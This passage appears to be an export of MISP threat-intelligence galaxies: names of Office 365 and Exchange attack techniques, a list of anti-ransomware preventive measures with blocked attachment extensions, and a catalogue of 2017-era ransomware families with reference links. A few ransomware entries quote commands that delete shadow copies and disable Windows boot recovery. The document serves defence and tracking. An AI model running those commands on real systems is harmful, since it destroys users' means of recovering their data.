
The tag is: misp-galaxy:cloud-security="End Point - Persistence throught Outlook Home Page: SensePost Ruler"

End Point - Persistence throught custom Outlook form

The tag is: misp-galaxy:cloud-security="End Point - Persistence throught custom Outlook form"

Mailbox Rule Creation

The tag is: misp-galaxy:cloud-security="Mailbox Rule Creation"

Mailbox Folder Permissions

The tag is: misp-galaxy:cloud-security="Mailbox Folder Permissions"

Mail Flow (Transport Rules)

The tag is: misp-galaxy:cloud-security="Mail Flow (Transport Rules)"

O365 - MailSniper: Search Mailbox for credentials

The tag is: misp-galaxy:cloud-security="O365 - MailSniper: Search Mailbox for credentials"

O365 - Search for Content with eDiscovery

The tag is: misp-galaxy:cloud-security="O365 - Search for Content with eDiscovery"

O365 - Account Takeover: Add-MailboxPermission

The tag is: misp-galaxy:cloud-security="O365 - Account Takeover: Add-MailboxPermission"

O365 - Pivot to On-Prem host: SensePost Ruler

The tag is: misp-galaxy:cloud-security="O365 - Pivot to On-Prem host: SensePost Ruler"

O365 - Exchange Tasks for C2: MWR

The tag is: misp-galaxy:cloud-security="O365 - Exchange Tasks for C2: MWR"

O365 - Send Internal Email

The tag is: misp-galaxy:cloud-security="O365 - Send Internal Email"

On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Search Mailboxes with eDiscovery searches (EXO, Teams, SPO, OD4B, Skype4B)"

On-Prem Exchange - Delegation

The tag is: misp-galaxy:cloud-security="On-Prem Exchange - Delegation"

O365 - MailSniper: Search Mailbox for content

The tag is: misp-galaxy:cloud-security="O365 - MailSniper: Search Mailbox for content"

O365 - Exfiltration email using EWS APIs with PowerShell

The tag is: misp-galaxy:cloud-security="O365 - Exfiltration email using EWS APIs with PowerShell"

Downgrade License

The tag is: misp-galaxy:cloud-security="Downgrade License"

Impersonate Users

The tag is: misp-galaxy:cloud-security="Impersonate Users"

Assign Administrative Role to Service Principal

The tag is: misp-galaxy:cloud-security="Assign Administrative Role to Service Principal"

Elevate to User Access Administrator Role

The tag is: misp-galaxy:cloud-security="Elevate to User Access Administrator Role"

eDiscovery Abuse

The tag is: misp-galaxy:cloud-security="eDiscovery Abuse"

O365 - Download documents, messages and email

The tag is: misp-galaxy:cloud-security="O365 - Download documents, messages and email"

Preventive Measure

Preventive measures based on the ransomware document overview as published in https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml# . The preventive measures are quite generic and can fit any standard Windows infrastructure and their security measures..

Preventive Measure is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Various

Backup and Restore Process

Make sure to have adequate backup processes on place and frequently test a restore of these backups. (Schrödinger’s backup - it is both existent and non-existent until you’ve tried a restore

The tag is: misp-galaxy:preventive-measure="Backup and Restore Process"

Table 5222. Table References
Links
http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7.[http://windows.microsoft.com/en-us/windows/back-up-restore-faq#1TC=windows-7.]

Block Macros

Disable macros in Office files downloaded from the Internet. This can be configured to work in two different modes: A.) Open downloaded documents in 'Protected View' B.) Open downloaded documents and block all macros

The tag is: misp-galaxy:preventive-measure="Block Macros"

Table 5223. Table References
Links
https://support.office.com/en-us/article/Enable-or-disable-macros-in-Office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6?ui=en-US&rs=en-US&ad=US
https://www.404techsupport.com/2016/04/office2016-macro-group-policy/?utm_source=dlvr.it&utm_medium=twitter

Disable WSH

Disable Windows Script Host

The tag is: misp-galaxy:preventive-measure="Disable WSH"

Table 5224. Table References
Links
http://www.windowsnetworking.com/kbase/WindowsTips/WindowsXP/AdminTips/Customization/DisableWindowsScriptingHostWSH.html

Filter Attachments Level 1

Filter the following attachments on your mail gateway: .ade, .adp, .ani, .bas, .bat, .chm, .cmd, .com, .cpl, .crt, .exe, .hlp, .ht, .hta, .inf, .ins, .isp, .jar, .job, .js, .jse, .lnk, .mda, .mdb, .mde, .mdz, .msc, .msi, .msp, .mst, .ocx, .pcd, .ps1, .reg, .scr, .sct, .shs, .svg, .url, .vb, .vbe, .vbs, .wbk, .wsc, .ws, .wsf, .wsh, .exe, .pif, .pub

The tag is: misp-galaxy:preventive-measure="Filter Attachments Level 1"

Filter Attachments Level 2

Filter the following attachments on your mail gateway: (Filter expression of Level 1 plus) .doc, .xls, .rtf, .docm, .xlsm, .pptm

The tag is: misp-galaxy:preventive-measure="Filter Attachments Level 2"

Restrict program execution

Block all program executions from the %LocalAppData% and %AppData% folder

The tag is: misp-galaxy:preventive-measure="Restrict program execution"

Table 5225. Table References
Links
http://www.fatdex.net/php/2014/06/01/disable-exes-from-running-inside-any-user-appdata-directory-gpo/
http://www.thirdtier.net/ransomware-prevention-kit/

Show File Extensions

Set the registry key "HideFileExt" to 0 in order to show all file extensions, even of known file types. This helps avoiding cloaking tricks that use double extensions. (e.g. "not_a_virus.pdf.exe")

The tag is: misp-galaxy:preventive-measure="Show File Extensions"

Table 5226. Table References
Links
http://www.sevenforums.com/tutorials/10570-file-extensions-hide-show.htm

Enforce UAC Prompt

Enforce administrative users to confirm an action that requires elevated rights

The tag is: misp-galaxy:preventive-measure="Enforce UAC Prompt"

Table 5227. Table References
Links
https://technet.microsoft.com/en-us/library/dd835564(WS.10).aspx

Remove Admin Privileges

Remove and restrict administrative rights whenever possible. Malware can only modify files that users have write access to.

The tag is: misp-galaxy:preventive-measure="Remove Admin Privileges"

Restrict Workstation Communication

Activate the Windows Firewall to restrict workstation to workstation communication

The tag is: misp-galaxy:preventive-measure="Restrict Workstation Communication"

Sandboxing Email Input

Using sandbox that opens email attachments and removes attachments based on behavior analysis

The tag is: misp-galaxy:preventive-measure="Sandboxing Email Input"

Execution Prevention

Software that allows to control the execution of processes - sometimes integrated in Antivirus software Free: AntiHook, ProcessGuard, System Safety Monitor

The tag is: misp-galaxy:preventive-measure="Execution Prevention"

Change Default "Open With" to Notepad

Force extensions primarily used for infections to open up in Notepad rather than Windows Script Host or Internet Explorer

The tag is: misp-galaxy:preventive-measure="Change Default "Open With" to Notepad"

Table 5228. Table References
Links
https://bluesoul.me/2016/05/12/use-gpo-to-change-the-default-behavior-of-potentially-malicious-file-extensions/

File Screening

Server-side file screening with the help of File Server Resource Manager

The tag is: misp-galaxy:preventive-measure="File Screening"

Table 5229. Table References
Links
http://jpelectron.com/sample/Info%20and%20Documents/Stop%20crypto%20badware%20before%20it%20ruins%20your%20day/1-PreventCrypto-Readme.htm

Restrict program execution #2

Block program executions (AppLocker)

The tag is: misp-galaxy:preventive-measure="Restrict program execution #2"

Table 5230. Table References
Links
https://technet.microsoft.com/en-us/library/dd759117%28v=ws.11%29.aspx
http://social.technet.microsoft.com/wiki/contents/articles/5211.how-to-configure-applocker-group-policy-to-prevent-software-from-running.aspx

EMET

Detect and block exploitation techniques

The tag is: misp-galaxy:preventive-measure="EMET"

Table 5231. Table References
Links
www.microsoft.com/emet[www.microsoft.com/emet]
http://windowsitpro.com/security/control-emet-group-policy

Sysmon

Detect Ransomware in an early stage with new Sysmon 5 File/Registry monitoring

The tag is: misp-galaxy:preventive-measure="Sysmon"

Table 5232. Table References
Links
https://twitter.com/JohnLaTwC/status/799792296883388416

Blacklist-phone-numbers

Filter the numbers at phone routing level including PABX

The tag is: misp-galaxy:preventive-measure="Blacklist-phone-numbers"

Table 5233. Table References
Links
https://wiki.freepbx.org/display/FPG/Blacklist+Module+User+Guide#BlacklistModuleUserGuide-ImportingorExportingaBlacklistinCSVFileFormat

ACL

Restrict access to shares users should not be allowed to write to

The tag is: misp-galaxy:preventive-measure="ACL"

Table 5234. Table References
Links
https://docs.microsoft.com/en-us/windows/desktop/secauthz/access-control-lists

Packet filtering

Limit access to a service by network/packet filtering the access to

The tag is: misp-galaxy:preventive-measure="Packet filtering"

Table 5235. Table References
Links
https://en.wikipedia.org/wiki/Firewall_(computing)

Ransomware

Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml and http://pastebin.com/raw/GHgpWjar.

Ransomware is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml - http://pastebin.com/raw/GHgpWjar - MISP Project - https://id-ransomware.blogspot.com/2016/07/ransomware-list.html

Nhtnwcuf Ransomware (Fake)

The tag is: misp-galaxy:ransomware="Nhtnwcuf Ransomware (Fake)"

Table 5236. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/nhtnwcuf-ransomware.html

CryptoJacky Ransomware

The tag is: misp-galaxy:ransomware="CryptoJacky Ransomware"

Table 5237. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/cryptojacky-ransomware.html
https://twitter.com/jiriatvirlab/status/838779371750031360

Kaenlupuf Ransomware

About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Kaenlupuf Ransomware"

Table 5238. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/kaenlupuf-ransomware.html

EnjeyCrypter Ransomware

The tag is: misp-galaxy:ransomware="EnjeyCrypter Ransomware"

Table 5239. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/enjey-crypter-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-10th-2017-spora-cerber-and-technical-writeups/
https://www.bleepingcomputer.com/news/security/embittered-enjey-ransomware-developer-launches-ddos-attack-on-id-ransomware/

Dangerous Ransomware

The tag is: misp-galaxy:ransomware="Dangerous Ransomware"

Table 5240. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/dangerous-ransomware.html

Vortex Ransomware

The tag is: misp-galaxy:ransomware="Vortex Ransomware"

Vortex Ransomware is also known as:

Ŧl๏tєгค гคภร๏๓ฬคгє

Table 5241. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/vortex-ransomware.html
https://twitter.com/struppigel/status/839778905091424260

GC47 Ransomware

The tag is: misp-galaxy:ransomware="GC47 Ransomware"

Table 5242. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/gc47-ransomware.html

RozaLocker Ransomware

The tag is: misp-galaxy:ransomware="RozaLocker Ransomware"

RozaLocker Ransomware is also known as:

Roza

Table 5243. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/rozalocker-ransomware.html
https://twitter.com/jiriatvirlab/status/840863070733885440

CryptoMeister Ransomware

The tag is: misp-galaxy:ransomware="CryptoMeister Ransomware"

Table 5244. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/cryptomeister-ransomware.html

GG Ransomware

The tag is: misp-galaxy:ransomware="GG Ransomware"

Table 5245. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/gg-ransomware.html

Project34 Ransomware

The tag is: misp-galaxy:ransomware="Project34 Ransomware"

Table 5246. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/project34-ransomware.html

PetrWrap Ransomware

The tag is: misp-galaxy:ransomware="PetrWrap Ransomware"

Table 5247. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/petrwrap-ransomware.html
https://www.bleepingcomputer.com/news/security/petrwrap-ransomware-is-a-petya-offspring-used-in-targeted-attacks/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/
https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/

Karmen Ransomware

The tag is: misp-galaxy:ransomware="Karmen Ransomware"

Table 5248. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/
https://id-ransomware.blogspot.co.il/2017/03/karmen-ransomware.html
https://twitter.com/malwrhunterteam/status/841747002438361089

Revenge Ransomware

The tag is: misp-galaxy:ransomware="Revenge Ransomware"

Table 5249. Table References
Links
https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/
https://id-ransomware.blogspot.co.il/2017/03/revenge-ransomware.html

Turkish FileEncryptor Ransomware

his is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Turkish FileEncryptor Ransomware"

Turkish FileEncryptor Ransomware is also known as:

Fake CTB-Locker

Table 5250. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/turkish-fileencryptor.html
https://twitter.com/JakubKroustek/status/842034887397908480

Kirk Ransomware & Spock Decryptor

The tag is: misp-galaxy:ransomware="Kirk Ransomware & Spock Decryptor"

Kirk Ransomware & Spock Decryptor is also known as:

Kirk & Spock Decryptor

Table 5251. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/kirkspock-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-17th-2017-revenge-petrwrap-and-captain-kirk/
https://www.bleepingcomputer.com/forums/t/642239/kirk-ransomware-help-support-topic-kirk-extension-ransom-notetxt/
http://www.networkworld.com/article/3182415/security/star-trek-themed-kirk-ransomware-has-spock-decryptor-demands-ransom-be-paid-in-monero.html
http://www.securityweek.com/star-trek-themed-kirk-ransomware-emerges
https://www.grahamcluley.com/kirk-ransomware-sports-star-trek-themed-decryptor-little-known-crypto-currency/
https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/

ZinoCrypt Ransomware

The tag is: misp-galaxy:ransomware="ZinoCrypt Ransomware"

Table 5252. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html
https://twitter.com/demonslay335?lang=en
https://twitter.com/malwrhunterteam/status/842781575410597894

Crptxxx Ransomware

The tag is: misp-galaxy:ransomware="Crptxxx Ransomware"

Table 5253. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html
https://www.bleepingcomputer.com/forums/t/609690/ultracrypter-cryptxxx-ultradecrypter-ransomware-help-topic-crypt-cryp1/page-84
http://www.fixinfectedpc.com/uninstall-crptxxx-ransomware-from-pc
https://twitter.com/malwrhunterteam/status/839467168760725508

MOTD Ransomware

The tag is: misp-galaxy:ransomware="MOTD Ransomware"

Table 5254. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html
https://www.bleepingcomputer.com/forums/t/642409/motd-of-ransome-hostage/
https://www.bleepingcomputer.com/forums/t/642409/motd-ransomware-help-support-topics-motdtxt-and-enc-extension/

CryptoDevil Ransomware

The tag is: misp-galaxy:ransomware="CryptoDevil Ransomware"

Table 5255. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/cryptodevil-ransomware.html
https://twitter.com/PolarToffee/status/843527738774507522

FabSysCrypto Ransomware

The tag is: misp-galaxy:ransomware="FabSysCrypto Ransomware"

Table 5256. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/fabsyscrypto-ransomware.html
https://twitter.com/struppigel/status/837565766073475072

Lock2017 Ransomware

The tag is: misp-galaxy:ransomware="Lock2017 Ransomware"

Table 5257. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/lock2017-ransomware.html

RedAnts Ransomware

The tag is: misp-galaxy:ransomware="RedAnts Ransomware"

Table 5258. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/redants-ransomware.html

ConsoleApplication1 Ransomware

The tag is: misp-galaxy:ransomware="ConsoleApplication1 Ransomware"

Table 5259. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/consoleapplication1-ransomware.html

KRider Ransomware

The tag is: misp-galaxy:ransomware="KRider Ransomware"

Table 5260. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/krider-ransomware.html
https://twitter.com/malwrhunterteam/status/836995570384453632

CYR-Locker Ransomware (FAKE)

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The following note is what you get if you put in the wrong key code: https://3.bp.blogspot.com/-qsS0x-tHx00/WLM3kkKWKAI/AAAAAAAAEDg/Zhy3eYf-ek8fY5uM0yHs7E0fEFg2AXG-gCLcB/s1600/failed-key.jpg

The tag is: misp-galaxy:ransomware="CYR-Locker Ransomware (FAKE)"

Table 5261. Table References
Links
https://id-ransomware.blogspot.co.il/search?updated-min=2017-01-01T00:00:00-08:00&updated-max=2018-01-01T00:00:00-08:00&max-results=50

DotRansomware

The tag is: misp-galaxy:ransomware="DotRansomware"

Table 5262. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/dotransomware.html

Unlock26 Ransomware

About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments.All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Unlock26 Ransomware"

Table 5263. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/unlock26-ransomware.html
https://www.bleepingcomputer.com/news/security/new-raas-portal-preparing-to-spread-unlock26-ransomware/

PicklesRansomware

The tag is: misp-galaxy:ransomware="PicklesRansomware"

PicklesRansomware is also known as:

Pickles

Table 5264. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/pickles-ransomware.html
https://twitter.com/JakubKroustek/status/834821166116327425

Vanguard Ransomware

The tag is: misp-galaxy:ransomware="Vanguard Ransomware"

Table 5265. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/vanguard-ransomware.html
https://twitter.com/JAMESWT_MHT/status/834783231476166657

PyL33T Ransomware

The tag is: misp-galaxy:ransomware="PyL33T Ransomware"

Table 5266. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/pyl33t-ransomware.html
https://twitter.com/Jan0fficial/status/834706668466405377

TrumpLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. This is the old VenusLocker in disquise .To delete shadow files use the following commend: C:\Windows\system32\wbem\wmic.exe shadowcopy delete&exit https://2.bp.blogspot.com/-8qIiBHnE9yU/WK1mZn3LgwI/AAAAAAAAD-M/ZKl7_Iwr1agYtlVO3HXaUrwitcowp5_NQCLcB/s1600/lock.jpg

The tag is: misp-galaxy:ransomware="TrumpLocker Ransomware"

Table 5267. Table References
Links
https://www.bleepingcomputer.com/news/security/new-trump-locker-ransomware-is-a-fraud-just-venuslocker-in-disguise/
https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-24th-2017-trump-locker-macos-rw-and-cryptomix/

Damage Ransomware

The tag is: misp-galaxy:ransomware="Damage Ransomware"

Table 5268. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/damage-ransomware.html
https://decrypter.emsisoft.com/damage
https://twitter.com/demonslay335/status/835664067843014656

XYZWare Ransomware

The tag is: misp-galaxy:ransomware="XYZWare Ransomware"

Table 5269. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/xyzware-ransomware.html
https://twitter.com/malwrhunterteam/status/833636006721122304

YouAreFucked Ransomware

The tag is: misp-galaxy:ransomware="YouAreFucked Ransomware"

YouAreFucked Ransomware is also known as:

FortuneCrypt

Table 5270. Table References
Links
https://www.enigmasoftware.com/youarefuckedransomware-removal/

CryptConsole 2.0 Ransomware

The tag is: misp-galaxy:ransomware="CryptConsole 2.0 Ransomware"

Table 5271. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

BarRax Ransomware

The tag is: misp-galaxy:ransomware="BarRax Ransomware"

BarRax Ransomware is also known as:

BarRaxCrypt Ransomware

Table 5272. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/barraxcrypt-ransomware.html
https://twitter.com/demonslay335/status/835668540367777792

CryptoLocker by NTK Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker by NTK Ransomware"

Table 5273. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/cryptolocker-by-ntk-ransomware.html

UserFilesLocker Ransomware

The tag is: misp-galaxy:ransomware="UserFilesLocker Ransomware"

UserFilesLocker Ransomware is also known as:

CzechoSlovak Ransomware

Table 5274. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/userfileslocker-ransomware.html

AvastVirusinfo Ransomware

The tag is: misp-galaxy:ransomware="AvastVirusinfo Ransomware"

Table 5275. Table References
Links
https://id-ransomware.blogspot.co.il/2017_03_01_archive.html
https://id-ransomware.blogspot.co.il/2017/03/avastvirusinfo-ransomware.html

SuchSecurity Ransomware

The tag is: misp-galaxy:ransomware="SuchSecurity Ransomware"

SuchSecurity Ransomware is also known as:

Such Security

Table 5276. Table References
Links
https://id-ransomware.blogspot.co.il/2017/03/suchsecurity-ransomware.html

PleaseRead Ransomware

The tag is: misp-galaxy:ransomware="PleaseRead Ransomware"

PleaseRead Ransomware is also known as:

VHDLocker Ransomware

Table 5277. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/vhd-ransomware.html

Kasiski Ransomware

The tag is: misp-galaxy:ransomware="Kasiski Ransomware"

Table 5278. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/kasiski-ransomware.html
https://twitter.com/MarceloRivero/status/832302976744173570
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/

Fake Locky Ransomware

The tag is: misp-galaxy:ransomware="Fake Locky Ransomware"

Fake Locky Ransomware is also known as:

Locky Impersonator Ransomware

Table 5279. Table References
Links
https://www.bleepingcomputer.com/news/security/the-locky-ransomware-encrypts-local-files-and-unmapped-network-shares/
https://id-ransomware.blogspot.co.il/2017/02/locky-impersonator.html
https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-thor-extension-after-being-a-bad-malware/

CryptoShield 1.0 Ransomware

The tag is: misp-galaxy:ransomware="CryptoShield 1.0 Ransomware"

Table 5280. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/cryptoshield-2-ransomware.html
https://www.bleepingcomputer.com/news/security/cryptomix-variant-named-cryptoshield-1-0-ransomware-distributed-by-exploit-kits/

Hermes Ransomware

The tag is: misp-galaxy:ransomware="Hermes Ransomware"

View relationships graph

Hermes Ransomware has relationships with:

similar: misp-galaxy:malpedia="Hermes Ransomware" with estimative-language:likelihood-probability="likely"

Table 5281. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/hermes-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/
https://www.bleepingcomputer.com/forums/t/642019/hermes-ransomware-help-support-decrypt-informationhtml/
https://www.bleepingcomputer.com/news/security/hermes-ransomware-decrypted-in-live-video-by-emsisofts-fabian-wosar/

LoveLock Ransomware or Love2Lock Ransomware

The tag is: misp-galaxy:ransomware="LoveLock Ransomware or Love2Lock Ransomware"

LoveLock Ransomware or Love2Lock Ransomware is also known as:

LoveLock
Love2Lock

Table 5282. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/lovelock-ransomware.html

Wcry Ransomware

The tag is: misp-galaxy:ransomware="Wcry Ransomware"

Table 5283. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/wcry-ransomware.html

DUMB Ransomware

The tag is: misp-galaxy:ransomware="DUMB Ransomware"

Table 5284. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/dumb-ransomware.html
https://twitter.com/bleepincomputer/status/816053140147597312?lang=en

X-Files

The tag is: misp-galaxy:ransomware="X-Files"

Table 5285. Table References
Links
https://id-ransomware.blogspot.co.il/2017_02_01_archive.html
https://id-ransomware.blogspot.co.il/2017/02/x-files-ransomware.html

Polski Ransomware

The tag is: misp-galaxy:ransomware="Polski Ransomware"

Table 5286. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/polski-ransomware.html

YourRansom Ransomware

The tag is: misp-galaxy:ransomware="YourRansom Ransomware"

Table 5287. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html
https://www.bleepingcomputer.com/news/security/yourransom-is-the-latest-in-a-long-line-of-prank-and-educational-ransomware/
https://twitter.com/_ddoxer/status/827555507741274113

Ranion RaasRansomware

The tag is: misp-galaxy:ransomware="Ranion RaasRansomware"

Table 5288. Table References
Links
https://id-ransomware.blogspot.co.il/2017/02/ranion-raas.html
https://www.bleepingcomputer.com/news/security/ranion-ransomware-as-a-service-available-on-the-dark-web-for-educational-purposes/

Potato Ransomware

Wants a ransom to get the victim’s files back . Originated in English. Spread worldwide.

The tag is: misp-galaxy:ransomware="Potato Ransomware"

Table 5289. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/polato-ransomware.html

of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)

This ransomware is originated in English, therefore could be used worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.

The tag is: misp-galaxy:ransomware="of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)"

Table 5290. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html

RansomPlus

Author of this ransomware is sergej. Ransom is 0.25 bitcoins for the return of files. Originated in English. Used worldwide. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.

The tag is: misp-galaxy:ransomware="RansomPlus"

Table 5291. Table References
Links
http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html
https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html
https://twitter.com/jiriatvirlab/status/825411602535088129

CryptConsole

This ransomware does not actually encrypt your file, but only changes the names of your files, just like Globe Ransomware. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files

The tag is: misp-galaxy:ransomware="CryptConsole"

Table 5292. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html
https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/
https://twitter.com/PolarToffee/status/824705553201057794
https://twitter.com/demonslay335/status/1004351990493741057
https://twitter.com/demonslay335/status/1004803373747572736

ZXZ Ramsomware

Originated in English, could affect users worldwide, however so far only reports from Saudi Arabia. The malware name founded by a windows server tools is called win32/wagcrypt.A

The tag is: misp-galaxy:ransomware="ZXZ Ramsomware"

Table 5293. Table References
Links
https://www.bleepingcomputer.com/forums/t/638191/zxz-ransomware-support-help-topic-zxz/?hl=%2Bzxz#entry4168310
https://id-ransomware.blogspot.co.il/2017/01/zxz-ransomware.html

VxLock Ransomware

Developed in Visual Studios in 2010. Original name is VxCrypt. This ransomware encrypts your files, including photos, music, MS office, Open Office, PDF… etc

The tag is: misp-galaxy:ransomware="VxLock Ransomware"

Table 5294. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/vxlock-ransomware.html

FunFact Ransomware

Funfact uses an open code for GNU Privacy Guard (GnuPG), then asks to email them to find out the amout of bitcoin to send (to receive a decrypt code). Written in English, can attach all over the world. The ransom is 1.22038 BTC, which is 1100USD.

The tag is: misp-galaxy:ransomware="FunFact Ransomware"

Table 5295. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/funfact.html
http://www.enigmasoftware.com/funfactransomware-removal/

ZekwaCrypt Ransomware

First spotted in May 2016, however made a big comeback in January 2017. It’s directed to English speaking users, therefore is able to infect worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.

The tag is: misp-galaxy:ransomware="ZekwaCrypt Ransomware"

Table 5296. Table References
Links
https://id-ransomware.blogspot.co.il/2016/06/zekwacrypt-ransomware.html
http://www.2-spyware.com/remove-zekwacrypt-ransomware-virus.html

Sage 2.0 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. This ransomware attacks your MS Office by offering a Micro to help with your program, but instead incrypts all your files if the used id not protected. Predecessor CryLocker

The tag is: misp-galaxy:ransomware="Sage 2.0 Ransomware"

Table 5297. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/sage-2-ransomware.html
https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/
http://www.securityweek.com/sage-20-ransomware-demands-2000-ransom
https://www.bleepingcomputer.com/news/security/sage-2-0-ransomware-gearing-up-for-possible-greater-distribution/
https://www.govcert.admin.ch/blog/27/sage-2.0-comes-with-ip-generation-algorithm-ipga

CloudSword Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. Uses the name “Window Update” to confuse its victims. Then imitates the window update process , while turning off the Window Startup Repair and changes the BootStatusPolicy using these commands: bcdedit.exe /set {default} recoveryenabled No bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

The tag is: misp-galaxy:ransomware="CloudSword Ransomware"

Table 5298. Table References
Links
https://id-ransomware.blogspot.co.il/2017/01/cloudsword.html
http://bestsecuritysearch.com/cloudsword-ransomware-virus-removal-steps-protection-updates/
https://twitter.com/BleepinComputer/status/822653335681593345

DN

It’s directed to English speaking users, therefore is able to infect worldwide. Uses the name “Chrome Update” to confuse its victims. Then imitates the chrome update process ,while encrypting the files. DO NOT pay the ransom, since YOUR COMPUTER WILL NOT BE RESTORED FROM THIS MALWARE!!!!

The tag is: misp-galaxy:ransomware="DN"

DN is also known as:

Fake

